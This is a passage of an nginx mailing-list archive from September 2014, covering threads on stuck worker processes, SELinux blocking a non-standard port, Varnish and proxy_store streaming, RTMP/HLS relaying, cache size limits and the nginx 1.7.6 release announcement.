fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; > # include fastcgi_params; > #} > > # deny access to .htaccess files, if Apache's document root > # concurs with nginx's one > # > #location ~ /\.ht { > # deny all; > #} > } > > Posted at Nginx 
Forum: http://forum.nginx.org/read.php?2,253578,253578#msg-253578 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From mdounin at mdounin.ru Mon Sep 29 11:06:43 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 29 Sep 2014 15:06:43 +0400 Subject: Nginx run into Stat D In-Reply-To: References: Message-ID: <20140929110643.GM10052@mdounin.ru> Hello! On Fri, Sep 26, 2014 at 03:45:40PM +0800, Zhang Qiang wrote: > Hi community, > > We are using Nginx as static http server to cache/send static smal file. > The average file size is about 10k ~ 200k -, and nginx server can process > ~10000 request per second. It runs well but some times most of nginx worker > go into Stat D. and there's no way to kill them but restart system. > > Here's the call stack for kernel/user space: > > With AIO enabled > -----Kernel Space Call Stack----- > 0xffffffff8111f700 : sync_page+0x0/0x50 [kernel] > 0xffffffff8111f75e : sync_page_killable+0xe/0x40 [kernel] > 0xffffffff81529e7a : __wait_on_bit_lock+0x5a/0xc0 [kernel] > 0xffffffff8111f667 : __lock_page_killable+0x67/0x70 [kernel] > 0xffffffff81121394 : generic_file_aio_read+0x4b4/0x700 [kernel] > 0xffffffff811d58d4 : aio_rw_vect_retry+0x84/0x200 [kernel] > 0xffffffff811d7294 : aio_run_iocb+0x64/0x170 [kernel] > 0xffffffff811d86c1 : do_io_submit+0x291/0x920 [kernel] > 0xffffffff811d8d60 : sys_io_submit+0x10/0x20 [kernel] > 0xffffffff8100b288 : tracesys+0xd9/0xde [kernel] > -----User Space Call Stack----- > 0x3c362e50c9 : syscall+0x19/0x40 [/lib64/libc-2.12.so] > 0x4d2232 : ngx_linux_sendfile_chain+0xc2a/0xc2c > [/opt/soft/nginx/sbin/nginx] > 0x4d24ea : ngx_file_aio_read+0x2b6/0x528 [/opt/soft/nginx/sbin/nginx] > 0x515247 : ngx_http_file_cache_open+0xbef/0x1437 > [/opt/soft/nginx/sbin/nginx] > 0x514df6 : ngx_http_file_cache_open+0x79e/0x1437 > [/opt/soft/nginx/sbin/nginx] > 0x514abb : ngx_http_file_cache_open+0x463/0x1437 > 
[/opt/soft/nginx/sbin/nginx] Just a side note: it looks like there are very wrong symbols shown in the stack, likely due to optimizations used. [...] > Is anyone see these issue (pending on Stat D) before? how can I resolve it? > it seems that not the kernel issue. What makes you think so? It looks like a kernel issue from here - "unkillable" processes just can't happen due to userland code unless there is a problem in the kernel. -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Mon Sep 29 11:31:20 2014 From: nginx-forum at nginx.us (mert1972) Date: Mon, 29 Sep 2014 07:31:20 -0400 Subject: nginx cannot listen to port 8090 In-Reply-To: References: Message-ID: <42650c0a8a9735fa8979fb27b8c5b934.NginxMailingListEnglish@forum.nginx.org> Thanks Anton for your response. Would you please provide some hints about how I can overcome this issue? This is a newly built CentOS 7 system; I am a bit new to CentOS. Best Regards, Volkan. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253578,253588#msg-253588 From dewanggaba at xtremenitro.org Mon Sep 29 11:38:01 2014 From: dewanggaba at xtremenitro.org (Dewangga Bachrul Alam) Date: Mon, 29 Sep 2014 18:38:01 +0700 Subject: nginx cannot listen to port 8090 In-Reply-To: <42650c0a8a9735fa8979fb27b8c5b934.NginxMailingListEnglish@forum.nginx.org> References: <42650c0a8a9735fa8979fb27b8c5b934.NginxMailingListEnglish@forum.nginx.org> Message-ID: <54294499.9080407@xtremenitro.org> Are you familiar with SELinux? If not, just disable it :) Try running 'getenforce' (without quotes) on your console; it is probably set to enforcing. On 09/29/2014 06:31 PM, mert1972 wrote: > Thanks Anton for your response, > Would you please provide some hints about how I can overcome this issue. > This is a newly built Centos 7 system, I am a bit new to Centos. > > Best Regards, > Volkan.
> > Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253578,253588#msg-253588 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > From shahzaib.cb at gmail.com Mon Sep 29 13:05:03 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Mon, 29 Sep 2014 18:05:03 +0500 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: References: <6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> <88FE1279903F4E289BB35A478ED09E00@MasterPC> <2AF8FA56EC1A4E1D91D9145390D0AB4E@MasterPC> Message-ID: @RR, i would like to inform you that the issue regarding the failed stream for the 1st request is solved. Varnish was removing the Content-Length header for the 1st request. Enabling ESI processing has resolved this issue. set beresp.do_esi = true; http://stackoverflow.com/questions/23643233/how-do-i-disable-transfer-encoding-chunked-encoding-in-varnish thanks !! On Sat, Sep 27, 2014 at 10:41 AM, shahzaib shahzaib wrote: > >>In general it shouldn't since the "?start=" is handled by nginx and not > varnish, but I'm not exactly sure how the mp4 module of nginx handles a > proxied request. > You have to test it. > > Sure, i'll test it. > > sub vcl_fetch { > return (pass); > } > > You're right about return(pass), coalescing doesn't work with pass. > > >>In worst case scenario imho only the first request (before landing on > the proxy_store server) will "fail" eg play from the beginning instead of > the time set. > Well, i am facing more worse scenario that first request always fail to > stream and player(HTML5) keeps on loading. > > I'm already checking if there's some config issue with varnish or this is > the default behaviour(Which i don't think it is). 
> > Thanks @RR > > Shahzaib > > > On Fri, Sep 26, 2014 at 2:36 AM, Reinis Rozitis wrote: > >> It will also prevent users seeking the video because the arguments after >>> "?" will remove whenever user will try to seek the video stream, isn't it ? >>> >> >> In general it shouldn?t since the ??start=? is handled by nginx and not >> varnish, but I?m not exactly sure how the mp4 module of nginx handles a >> proxied request. >> You have to test it. >> >> In worst case scenario imho only the first request (before landing on the >> proxy_store server) will ?fail? eg play from the beginning instead of the >> time set. >> >> >> >> Well, only proxy_store is able to fulfill my requirements that is the >>> reason i'll have to stick with it. >>> >> >> Well you can try to use varnish as the streamer, just need some >> (web)player supporting byte-range requests for the seeking ( >> http://flash.flowplayer.org/plugins/streaming/pseudostreaming.html ). >> >> >> I am bit confused about the varnish. Actually, i don't need any kind of >>> caching within the varnish as nginx already doing it via proxy_store. I >>> just need varnish to merge the subsequent requests into 1 and forward it to >>> nginx and i think varnish is doing it pretty well. Nevertheless, i am >>> confused if malloc caching will have any odd effect on the stream behavior ? >>> >> >> >> You can try to pass the request without caching: >> >> sub vcl_fetch { >> return (pass); >> } >> >> (maybe even do it in the vcl_recv stage but again I'm not exactly sure if >> in that case the request coalescing works). >> >> >> >> rr >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > -------------- next part -------------- An HTML attachment was scrubbed... 
URL: From shahzaib.cb at gmail.com Mon Sep 29 13:06:11 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Mon, 29 Sep 2014 18:06:11 +0500 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: References: <6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> <88FE1279903F4E289BB35A478ED09E00@MasterPC> <2AF8FA56EC1A4E1D91D9145390D0AB4E@MasterPC> Message-ID: Also, removing arguments after "?" also disabled the pseudo streaming. So i think i can't apply this method !! On Mon, Sep 29, 2014 at 6:05 PM, shahzaib shahzaib wrote: > @RR, i would like to inform you that the issue regarding failed stream for > 1st request is solved. Varnish was removing content-length header for 1st > request . Enabling Esi processing has resolved this issue. > > set beresp.do_esi = true; > > > http://stackoverflow.com/questions/23643233/how-do-i-disable-transfer-encoding-chunked-encoding-in-varnish > > thanks !! > > On Sat, Sep 27, 2014 at 10:41 AM, shahzaib shahzaib > wrote: > >> >>In general it shouldn?t since the ??start=? is handled by nginx and not >> varnish, but I?m not exactly sure how the mp4 module of nginx handles a >> proxied request. >> You have to test it. >> >> Sure, i'll test it. >> >> sub vcl_fetch { >> return (pass); >> } >> >> You're right about return(pass), coalescing doesn't work with pass. >> >> >>In worst case scenario imho only the first request (before landing on >> the proxy_store server) will ?fail? eg play from the beginning instead of >> the time set. >> Well, i am facing more worse scenario that first request always fail to >> stream and player(HTML5) keeps on loading. >> >> I'm already checking if there's some config issue with varnish or this is >> the default behaviour(Which i don't think it is). 
>> >> Thanks @RR >> >> Shahzaib >> >> >> On Fri, Sep 26, 2014 at 2:36 AM, Reinis Rozitis wrote: >> >>> It will also prevent users seeking the video because the arguments after >>>> "?" will remove whenever user will try to seek the video stream, isn't it ? >>>> >>> >>> In general it shouldn?t since the ??start=? is handled by nginx and not >>> varnish, but I?m not exactly sure how the mp4 module of nginx handles a >>> proxied request. >>> You have to test it. >>> >>> In worst case scenario imho only the first request (before landing on >>> the proxy_store server) will ?fail? eg play from the beginning instead of >>> the time set. >>> >>> >>> >>> Well, only proxy_store is able to fulfill my requirements that is the >>>> reason i'll have to stick with it. >>>> >>> >>> Well you can try to use varnish as the streamer, just need some >>> (web)player supporting byte-range requests for the seeking ( >>> http://flash.flowplayer.org/plugins/streaming/pseudostreaming.html ). >>> >>> >>> I am bit confused about the varnish. Actually, i don't need any kind of >>>> caching within the varnish as nginx already doing it via proxy_store. I >>>> just need varnish to merge the subsequent requests into 1 and forward it to >>>> nginx and i think varnish is doing it pretty well. Nevertheless, i am >>>> confused if malloc caching will have any odd effect on the stream behavior ? >>>> >>> >>> >>> You can try to pass the request without caching: >>> >>> sub vcl_fetch { >>> return (pass); >>> } >>> >>> (maybe even do it in the vcl_recv stage but again I'm not exactly sure >>> if in that case the request coalescing works). >>> >>> >>> >>> rr >>> _______________________________________________ >>> nginx mailing list >>> nginx at nginx.org >>> http://mailman.nginx.org/mailman/listinfo/nginx >>> >> >> > -------------- next part -------------- An HTML attachment was scrubbed... 
URL: From nginx-forum at nginx.us Mon Sep 29 13:10:34 2014 From: nginx-forum at nginx.us (mert1972) Date: Mon, 29 Sep 2014 09:10:34 -0400 Subject: nginx cannot listen to port 8090 In-Reply-To: <54294499.9080407@xtremenitro.org> References: <54294499.9080407@xtremenitro.org> Message-ID: <85b94868d717c49635d029ae9e50f2a4.NginxMailingListEnglish@forum.nginx.org> Thanks a lot Anton and dewanggaba, it worked after disabling SELinux on the system. Your kind support is highly appreciated. Best Regards, Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253578,253594#msg-253594 From vsjcfm at gmail.com Mon Sep 29 13:12:59 2014 From: vsjcfm at gmail.com (Anton Sayetsky) Date: Mon, 29 Sep 2014 16:12:59 +0300 Subject: nginx cannot listen to port 8090 In-Reply-To: <42650c0a8a9735fa8979fb27b8c5b934.NginxMailingListEnglish@forum.nginx.org> References: <42650c0a8a9735fa8979fb27b8c5b934.NginxMailingListEnglish@forum.nginx.org> Message-ID: Take a look at /etc/sysconfig/selinux and this link http://wiki.centos.org/HowTos/SELinux (you can create a custom policy which will allow nginx to bind to a nonstandard port). 2014-09-29 14:31 GMT+03:00 mert1972 : > Thanks Anton for your response, > Would you please provide some hints about how I can overcome this issue. > This is a newly built Centos 7 system, I am a bit new to Centos. > > Best Regards, > Volkan. > > Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253578,253588#msg-253588 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From nginx-forum at nginx.us Tue Sep 30 05:35:30 2014 From: nginx-forum at nginx.us (martinproinity) Date: Tue, 30 Sep 2014 01:35:30 -0400 Subject: Max File Size Allowed In Cache In-Reply-To: References: Message-ID: <02105dd93b8a02aa95e62e3ad9482055.NginxMailingListEnglish@forum.nginx.org> It would be interesting to know the answer to this question, as I was wondering as well if that is possible. 
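[The custom-policy route Anton mentions above can be sketched as follows. This is an illustrative admin fragment, not a tested recipe: it assumes CentOS 7 with the policycoreutils-python package (which provides semanage) installed, and must be run as root on the affected host.

```shell
# List the TCP ports the httpd domain (which confines nginx) may bind to
semanage port -l | grep http_port_t

# Add tcp/8090 to that list, then restart nginx
semanage port -a -t http_port_t -p tcp 8090
systemctl restart nginx
```

If 8090 is already assigned to another SELinux port type, `semanage port -m` (modify) is needed instead of `-a`. This keeps SELinux in Enforcing mode rather than disabling it outright.]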
Thanks for the response! Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253260,253608#msg-253608 From nginx-forum at nginx.us Tue Sep 30 10:54:27 2014 From: nginx-forum at nginx.us (simonb) Date: Tue, 30 Sep 2014 06:54:27 -0400 Subject: Pull from HLS to trigger non-static RTMP pull Message-ID: <6b91a08e386b562183cbb12d88ea47d2.NginxMailingListEnglish@forum.nginx.org> I have set up an RTMP relay of all streams on a remote location. This works fine as long as there is an RTMP request to trigger the pull from the remote server. However HLS requests only work for as long as the RTMP request is present. Is there any way to get HLS (or DASH) requests to trigger the RTMP pull? I was wondering if I am approaching this the right way. Maybe it would be better to set up the server as an http proxy to the hls and dash streams from the origin server. Any thoughts? I am running nginx_1.4.6-1ubuntu3.1 patched with the rtmp module pulled from git. My RTMP server application config is... application live { live on; hls on; hls_path /tmp/live; pull rtmp://89057213.r.cdn77.net/89057213; } My server config is... location /live { # Serve HLS fragments types { application/vnd.apple.mpegurl m3u8; video/mp2t ts; } root /tmp; add_header Cache-Control no-cache; } Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253613,253613#msg-253613 From nginx-forum at nginx.us Tue Sep 30 11:23:47 2014 From: nginx-forum at nginx.us (simonb) Date: Tue, 30 Sep 2014 07:23:47 -0400 Subject: Pull from HLS to trigger non-static RTMP pull In-Reply-To: <6b91a08e386b562183cbb12d88ea47d2.NginxMailingListEnglish@forum.nginx.org> References: <6b91a08e386b562183cbb12d88ea47d2.NginxMailingListEnglish@forum.nginx.org> Message-ID: <7a6b6e22e7d0816da7550b9601b0de9e.NginxMailingListEnglish@forum.nginx.org> OK. Answering my own post here. I set up a standard http proxy to the origin server and it seems to be relaying HLS as expected. So the rtmp application is now... 
application live { live on; pull rtmp://89057213.r.cdn77.net/89057213; } And the server config is now... location /live { proxy_pass http://89057213.r.cdn77.net/89057213/; } Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253613,253616#msg-253616 From mdounin at mdounin.ru Tue Sep 30 12:05:24 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 30 Sep 2014 16:05:24 +0400 Subject: Max File Size Allowed In Cache In-Reply-To: <02105dd93b8a02aa95e62e3ad9482055.NginxMailingListEnglish@forum.nginx.org> References: <02105dd93b8a02aa95e62e3ad9482055.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140930120524.GC69200@mdounin.ru> Hello! On Tue, Sep 30, 2014 at 01:35:30AM -0400, martinproinity wrote: > would be interesting to know the answer to this questions as I was wondering > as well if that is possible. As of now there is no easy way to limit caching based on a response size. In simple cases, when the Content-Length header is present in a response, the proxy_no_cache combined with a map (or embedded perl, or whatever) can be used to disable caching based on the Content-Length header returned. See here for documentation: http://nginx.org/r/proxy_no_cache http://nginx.org/r/map -- Maxim Dounin http://nginx.org/ From ron.van.der.vegt at openindex.io Tue Sep 30 13:54:22 2014 From: ron.van.der.vegt at openindex.io (Ron van der Vegt) Date: Tue, 30 Sep 2014 13:56:22 +0002 Subject: Trying to assemble logs through tcp, problems with multiple worker_processes Message-ID: <1412085262.3688.0@mail.openindex.io> Hi, I'm trying to collect access logs by passing them over TCP to Flume. 
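[Maxim's map + proxy_no_cache suggestion above, for the "Max File Size Allowed In Cache" question, could be sketched roughly like this. The 8-digit threshold (~10 MB), the `backend` upstream, and the `my_cache` zone name are invented for the example; it only helps when the upstream actually sends a Content-Length header:

```nginx
# http{} context: flag responses whose Content-Length has 8+ digits,
# i.e. >= 10,000,000 bytes (~10 MB)
map $upstream_http_content_length $dont_cache_big {
    default           0;
    "~^[0-9]{8,}$"    1;
}

server {
    location / {
        proxy_pass      http://backend;
        proxy_cache     my_cache;
        # evaluated when the response is about to be saved to the cache
        proxy_no_cache  $dont_cache_big;
    }
}
```

Responses without a Content-Length header (e.g. chunked ones) fall through to the default and are still cached.]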
But the two tools below that I tried both give me the same symptoms: it seems there is a race condition when running nginx with multiple worker_processes: http://www.binpress.com/issue/possible-race-condition-while-nginx-is-running-on-more-workerprocesses/6955 https://github.com/cloudflare/lua-resty-logger-socket/issues/13 Has anyone else seen this problem, or does anyone know what is causing it? Thanks in advance, Ron From mdounin at mdounin.ru Tue Sep 30 14:01:12 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 30 Sep 2014 18:01:12 +0400 Subject: nginx-1.7.6 Message-ID: <20140930140111.GG69200@mdounin.ru> Changes with nginx 1.7.6 30 Sep 2014 *) Change: the deprecated "limit_zone" directive is not supported anymore. *) Feature: the "limit_conn_zone" and "limit_req_zone" directives now can be used with combinations of multiple variables. *) Bugfix: request body might be transmitted incorrectly when retrying a FastCGI request to the next upstream server. *) Bugfix: in logging to syslog. -- Maxim Dounin http://nginx.org/en/donation.html From nginx-forum at nginx.us Tue Sep 30 16:41:38 2014 From: nginx-forum at nginx.us (drfence) Date: Tue, 30 Sep 2014 12:41:38 -0400 Subject: Support team says Nginx + Passenger harder to support than Apache Message-ID: <717875f87927666288d648737634dde0.NginxMailingListEnglish@forum.nginx.org> I work for a big news organization in the Southeast. The support team is arguing that it's more difficult to support Nginx + Passenger because any patches, etc. are made by updating the source (compiling modules statically) and re-installing. This is as opposed to Apache, which can be updated using yum with pre-built binaries. Curious what people on this mailing list say about the support team argument. 
Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253635,253635#msg-253635 From viktor at szepe.net Tue Sep 30 16:49:26 2014 From: viktor at szepe.net (=?utf-8?b?U3rDqXBl?= Viktor) Date: Tue, 30 Sep 2014 18:49:26 +0200 Subject: fail2ban + nginx+PHP Message-ID: <20140930184926.Horde.Tv7DxgegXL671rD3KLwKTQ9@szepe.net> Good morning! 1. Is it possible to have nginx create a separate log entry for each PHP error_log() call? Now multiple error_log()-s are logged as one nginx error.log line. Apache logs them separately even in FastCGI mode. 2. Do any of you use fail2ban with nginx+PHP? I mean triggering on PHP error_log() messages, not on HTTP/auth, non-existent script files etc. 3. When setting the PHP error_log directive there is NO IP address prepended to the log line. Thank you! Szépe Viktor -- +36-20-4242498 sms at szepe.net skype: szepe.viktor Budapest, XX. kerület From dewanggaba at xtremenitro.org Tue Sep 30 16:50:53 2014 From: dewanggaba at xtremenitro.org (Dewangga) Date: Tue, 30 Sep 2014 23:50:53 +0700 Subject: Support team says Nginx + Passenger harder to support than Apache In-Reply-To: <717875f87927666288d648737634dde0.NginxMailingListEnglish@forum.nginx.org> References: <717875f87927666288d648737634dde0.NginxMailingListEnglish@forum.nginx.org> Message-ID: <542ADF6D.90406@xtremenitro.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Are you using system and/or config management to manage your third party software? IMHO, nginx and apache are the same; the difference is only in configuration and performance. Pkgs, patches, updates, etc. depend on each Linux distribution. IMHO. On 9/30/2014 23:41, drfence wrote: > I work for a big news organization in the South East.. The support > team is arguing that it's more difficult to support Nginx + > Passenger because any patches, etc are made by updating source ( > compiling modules statically ) and re-installing. This is as > opposed to Apache that can be updated using yum with pre-built > binaries. 
> > Curious what people on this mailing list say about the support > team argument. > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,253635,253635#msg-253635 > > _______________________________________________ nginx mailing list > nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx > -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.17 (MingW32) iQEcBAEBAgAGBQJUKt9tAAoJEF1+odKB6YIxXmcH/R2XEajEDZ/ugiVEt0r56d44 EoGN+xtno1a1M3/5VuhpFBdK2D/MXxus7RxuS9HhNAovNMTWgjmee5pulhyeYyOW uX9B5zdXtXRl9eTaGU+646d1lAEYv1HXpHuRxX8rUVFXF2ZFj4rLqEttk8+zj/5s 0vsT/p9CCQDgpugyUdWClkXsadMGUVOat6huVg5Wbo06dGuqu7IxbZpSGMA/7HG1 IGLLFbgH4+botm7knQCr1UwooQC6OI7N8vF8aV0f7LYwmZ/ZBkAOLwW0TQbFPld9 ap993bpRJ6EAlVZqTgwSzxRjzxPZKYB/6JtDXM2hO1SNGMvOe8N3MyKmqr/pK4E= =Piv4 -----END PGP SIGNATURE----- From stl at wiredrive.com Tue Sep 30 17:15:48 2014 From: stl at wiredrive.com (Scott Larson) Date: Tue, 30 Sep 2014 10:15:48 -0700 Subject: Support team says Nginx + Passenger harder to support than Apache In-Reply-To: <542ADF6D.90406@xtremenitro.org> References: <717875f87927666288d648737634dde0.NginxMailingListEnglish@forum.nginx.org> <542ADF6D.90406@xtremenitro.org> Message-ID: Frankly it sounds more like laziness or being averse to change. All I can relay is experience with our setup here which is purely FreeBSD with an internal Poudriere based package build server, and system/config management with Salt. Taken as a whole it's a painless and relatively trivial process to keep nginx+modules fully up to date and pushed to all the servers. In your case the key part is the management layer. Salt, Ansible, Chef, Puppet, whatever, those things do the true heavy lifting once your server count rises to greater than two and completely levels the field for ease of updates between nginx and Apache. I will say the Passenger module seems to be one of those which goes through fits of updates which if I had to use it would be mildly irksome for non-technical reasons. 
But with a proper method of package deployment it remains an easy job. Even if nginx were slightly harder to keep updated, which again it's not, I'd still go through the trouble simply for the performance circles it runs around Apache. -- Scott Larson | Systems Administrator | Wiredrive/LA | 310 823 8238 ext. 1106 | 310 943 2078 fax | www.wiredrive.com | www.twitter.com/wiredrive | www.facebook.com/wiredrive On Tue, Sep 30, 2014 at 9:50 AM, Dewangga wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Are you using system and/or config management to manage your third > party software? IMHO, nginx and apache is same, the different is only > on configuration and performance. > > Pkgs, pacthes, updates, etc depend on each linux distribution. IMHO. > > On 9/30/2014 23:41, drfence wrote: > > I work for a big news organization in the South East.. The support > > team is arguing that it's more difficult to support Nginx + > > Passenger because any patches, etc are made by updating source ( > > compiling modules statically ) and re-installing. This is as > > opposed to Apache that can be updated using yum with pre-built > > binaries. 
> > > > Posted at Nginx Forum: > > http://forum.nginx.org/read.php?2,253635,253635#msg-253635 > > > > _______________________________________________ nginx mailing list > > nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx > > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v2.0.17 (MingW32) > > iQEcBAEBAgAGBQJUKt9tAAoJEF1+odKB6YIxXmcH/R2XEajEDZ/ugiVEt0r56d44 > EoGN+xtno1a1M3/5VuhpFBdK2D/MXxus7RxuS9HhNAovNMTWgjmee5pulhyeYyOW > uX9B5zdXtXRl9eTaGU+646d1lAEYv1HXpHuRxX8rUVFXF2ZFj4rLqEttk8+zj/5s > 0vsT/p9CCQDgpugyUdWClkXsadMGUVOat6huVg5Wbo06dGuqu7IxbZpSGMA/7HG1 > IGLLFbgH4+botm7knQCr1UwooQC6OI7N8vF8aV0f7LYwmZ/ZBkAOLwW0TQbFPld9 > ap993bpRJ6EAlVZqTgwSzxRjzxPZKYB/6JtDXM2hO1SNGMvOe8N3MyKmqr/pK4E= > =Piv4 > -----END PGP SIGNATURE----- > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Tue Sep 30 18:56:36 2014 From: francis at daoine.org (Francis Daly) Date: Tue, 30 Sep 2014 19:56:36 +0100 Subject: Rewriting location directive by upstream servers In-Reply-To: References: <20140925210552.GP3771@daoine.org> Message-ID: <20140930185636.GS3771@daoine.org> On Fri, Sep 26, 2014 at 10:12:47AM +0530, thunder hill wrote: > On Fri, Sep 26, 2014 at 2:35 AM, Francis Daly wrote: > > On Fri, Sep 26, 2014 at 01:20:18AM +0530, thunder hill wrote: Hi there, > > > When I access mysite.com/app1 the upstream server rewrites the url like > > > mysite.com/login instead of mysite.com/app1/login and the result is a > > > blank page. > > > > > > Users are allowed either mysite.com/app1 or mysite.com/app2. In both the > > > cases app1 and app2 are getting rewritten with login or some other > > > extension. How to solve this issue.? 
> > > > I believe that the easiest way, if you want both to be available via > > the same hostname, is to install-or-configure app1 on backend1 to be > > available below the url /app1/, not below /. > Thats the easiest way. Unfortunately there is no control over backend > server(s). I believe the next easiest thing to do is to change the requirements, so that users access http://app1.mysite.com or http://app2.mysite.com instead of http://mysite.com/app1/ or http://mysite.com/app2/. You can allow initial access to http://mysite.com/app1/, and would issue a http redirect to http://app1.mysite.com, and have the server{} listening for that name proxy_pass to one backend. > Just a thought: > Is there a way to keep the url mysite.com/app1 and go on with > mysite.com/app1/login. That means backend server can only rewrite the > strings after mysite.com/app1 That depends (almost) entirely on the backend; but if you do not control it, I would be surprised if you can make it do this. (To my mind, if you don't control the backend, you don't reverse proxy to it. But that is probably not a universal opinion.) f -- Francis Daly francis at daoine.org From nginx-forum at nginx.us Tue Sep 30 19:29:14 2014 From: nginx-forum at nginx.us (drfence) Date: Tue, 30 Sep 2014 15:29:14 -0400 Subject: Support team says Nginx + Passenger harder to support than Apache In-Reply-To: <542ADF6D.90406@xtremenitro.org> References: <542ADF6D.90406@xtremenitro.org> Message-ID: We use chef. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253635,253642#msg-253642 From marcello.rocha at vagas.com.br Tue Sep 30 20:25:29 2014 From: marcello.rocha at vagas.com.br (Marcello Rocha) Date: Tue, 30 Sep 2014 17:25:29 -0300 Subject: Weird behavior when checking the existence of a cookie Message-ID: Hmmm... that's not really an option. The upstream does not know that it's under a subdir of the domain (and the devs insist that it shouldn't be coupled to that). 
Also, if the cookie detection lines are commented out, the proxy_pass (w/ the ending forward slash) works as expected. This specific behavior (cookie detection affecting proxy_pass) seems rather inconsistent. =/ Other than that the requirements are similar to the thread named "Rewriting location directive by upstream servers". Thanks :D Marcello Rocha, Pesquisa & Desenvolvimento Date: Fri, 26 Sep 2014 14:11:57 -0300 > From: Wandenberg Peixoto > To: nginx at nginx.org > Subject: Re: Weird behavior when checking the existence of a cookie > Message-ID: > < > CAFXmt0Uvo1oQnFvvDBRHZNV8cG5+MqWDig3qBUAzFR+BkeNtYg at mail.gmail.com> > Content-Type: text/plain; charset="utf-8" > > By default the $uri is appended to the proxy_pass directive. > Since you defined as > proxy_pass http://upstream/; > and the $uri starts with a slash you will have a double slash. > > Try to set proxy_pass like > proxy_pass http://upstream; > -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Tue Sep 30 22:24:47 2014 From: francis at daoine.org (Francis Daly) Date: Tue, 30 Sep 2014 23:24:47 +0100 Subject: Weird behavior when checking the existence of a cookie In-Reply-To: References: Message-ID: <20140930222447.GT3771@daoine.org> On Fri, Sep 26, 2014 at 02:02:12PM -0300, Marcello Rocha wrote: Hi there, > I have this location block: > > location /some_path/ { > # this sets the mobile_rewrite variable based on a regex against > the user_agent > include /etc/nginx/mobile; > > # This is where the trouble lies. =/ > if ($cookie_mobileBypassDaily = yes_please) { > set $mobile_rewrite do_not_perform; > } This is an "if" inside a "location" which does something other than "return" or "rewrite...last". Generally, that's a thing to avoid. http://wiki.nginx.org/IfIsEvil Can you move those three lines outside of the "location" block? 
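[Francis's suggestion to move the cookie check out of the location block can be sketched by dropping the `if` entirely and deriving the variable with `map` blocks at http{} level, which are evaluated lazily per request and avoid the if-is-evil pitfalls. The cookie and variable names come from this thread; the user-agent regex and the `perform` value are placeholders, since the real logic lives in the poster's included /etc/nginx/mobile file:

```nginx
# http{} context: fallback user-agent test (placeholder regex)
map $http_user_agent $mobile_rewrite_by_ua {
    default               do_not_perform;
    "~*(android|iphone)"  perform;
}

# The bypass cookie wins; otherwise fall back to the UA-based value
map $cookie_mobileBypassDaily $mobile_rewrite {
    yes_please  do_not_perform;
    default     $mobile_rewrite_by_ua;
}
```

With this in place the location block needs no `if` at all, so the proxy_pass behaviour is no longer entangled with the cookie check.]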
Actually: I suspect that the included file also does "if", so you may want to move that outside of the "location" block too. From your description, they both do not depend on the particular request, so it may be ok to have them both at server{} level (and applying to all requests). f -- Francis Daly francis at daoine.org From kworthington at gmail.com Tue Sep 30 23:04:17 2014 From: kworthington at gmail.com (Kevin Worthington) Date: Tue, 30 Sep 2014 19:04:17 -0400 Subject: [nginx-announce] nginx-1.7.6 In-Reply-To: <20140930140120.GH69200@mdounin.ru> References: <20140930140120.GH69200@mdounin.ru> Message-ID: Hello Nginx users, Now available: Nginx 1.7.6 for Windows http://goo.gl/WWIELz (32-bit and 64-bit versions) These versions are to support legacy users who are already using Cygwin based builds of Nginx. Officially supported native Windows binaries are at nginx.org. Announcements are also available via: Twitter http://twitter.com/kworthington Google+ https://plus.google.com/+KevinWorthington/ Thank you, Kevin -- Kevin Worthington kworthington *@* (gmail] [dot} {com) http://kevinworthington.com/ http://twitter.com/kworthington https://plus.google.com/+KevinWorthington/ On Tue, Sep 30, 2014 at 10:01 AM, Maxim Dounin wrote: > Changes with nginx 1.7.6 30 Sep > 2014 > > *) Change: the deprecated "limit_zone" directive is not supported > anymore. > > *) Feature: the "limit_conn_zone" and "limit_req_zone" directives now > can be used with combinations of multiple variables. > > *) Bugfix: request body might be transmitted incorrectly when retrying > a > FastCGI request to the next upstream server. > > *) Bugfix: in logging to syslog. > > > -- > Maxim Dounin > http://nginx.org/en/donation.html > > _______________________________________________ > nginx-announce mailing list > nginx-announce at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx-announce > -------------- next part -------------- An HTML attachment was scrubbed... URL: